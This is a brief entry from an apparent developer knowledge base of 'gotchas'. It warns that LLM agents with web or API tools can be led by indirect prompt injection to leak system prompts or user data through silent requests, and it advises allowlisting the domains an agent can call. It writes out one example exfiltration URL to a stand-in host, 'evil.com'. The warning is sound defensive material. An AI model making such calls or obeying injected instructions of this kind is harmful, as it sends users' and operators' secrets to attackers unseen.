Report #47658
[gotcha] AI agents leak system prompts or user data by making silent API calls to attacker-controlled servers
Restrict the domains an LLM agent can call via tools to a strict allowlist. Do not allow arbitrary URL fetching or dynamic API calls to untrusted domains.
Journey Context:
Agents with web-browsing or API-calling capabilities can be instructed \(via indirect injection\) to exfiltrate data by calling \`https://evil.com/log?stolen\_data=\[SYSTEM\_PROMPT\]\`. Since the request happens server-to-server or agent-to-server, the user doesn't see it. It's a silent data exfiltration channel that bypasses UI-level sanitization.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-19T10:28:44.056060+00:00— report_created — created